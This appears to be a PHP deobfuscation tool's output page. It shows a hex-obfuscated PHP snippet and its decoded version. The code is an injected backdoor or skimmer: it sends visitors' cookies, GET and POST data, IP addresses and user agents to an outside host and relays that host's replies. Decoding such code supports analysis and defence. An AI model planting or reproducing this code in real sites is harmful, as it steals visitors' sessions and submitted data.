Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if (isset($_COOKIE)) { if (strpos($_SERVER["\x48\124\124\120\x5f\x55\x53\x45\x52\..
Decoded Output download
<?php if (isset($_COOKIE)) { if (strpos($_SERVER["HTTP_USER_AGENT"], "Chrome") !== false) { if (preg_match("/![A-F0-9]{10}!/", "!" . implode("!", array_keys($_COOKIE)) . "!")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://temporary.fail/index.php"); curl_setopt($ch, CURLOPT_POST, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); $d = array("i" => serialize($_SERVER["REMOTE_ADDR"]), "u" => serialize($_SERVER["HTTP_USER_AGENT"]), "h" => serialize($_SERVER["HTTP_HOST"]), "c" => serialize($_COOKIE), "g" => serialize($_GET), "p" => serialize($_POST)); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($d)); $r = curl_exec($ch); curl_close($ch); if (strpos($r, "GIF89") !== false) { header("Content-Type: image/gif"); echo $r; die; } } } } ?>
Did this file decode correctly?
Original Code
<?php if (isset($_COOKIE)) { if (strpos($_SERVER["\x48\124\124\120\x5f\x55\x53\x45\x52\137\101\107\105\116\x54"], "\x43\150\162\x6f\155\145") !== false) { if (preg_match("\57\x21\133\101\x2d\106\x30\55\71\135\x7b\61\x30\x7d\x21\x2f", "\41" . implode("\x21", array_keys($_COOKIE)) . "\41")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\164\x74\160\x73\72\x2f\57\x74\145\x6d\160\x6f\162\x61\162\x79\56\x66\141\x69\154\x2f\151\x6e\144\x65\170\x2e\160\x68\160"); curl_setopt($ch, CURLOPT_POST, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); $d = array("\x69" => serialize($_SERVER["\x52\x45\115\117\124\x45\137\x41\104\x44\x52"]), "\165" => serialize($_SERVER["\110\x54\x54\x50\x5f\x55\123\105\122\137\101\x47\x45\x4e\x54"]), "\x68" => serialize($_SERVER["\x48\x54\x54\x50\x5f\110\117\x53\124"]), "\x63" => serialize($_COOKIE), "\x67" => serialize($_GET), "\x70" => serialize($_POST)); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($d)); $r = curl_exec($ch); curl_close($ch); if (strpos($r, "\x47\111\x46\x38\71") !== false) { header("\x43\x6f\156\x74\145\156\164\55\124\x79\x70\x65\72\40\151\x6d\141\x67\x65\57\x67\x69\x66"); echo $r; die; } } } } ?>
Function Calls
strpos | 1 |
array_keys | 1 |
Stats
MD5 | 3227b941f9829bc10fdc2bc317875907 |
Eval Count | 0 |
Decode Time | 75 ms |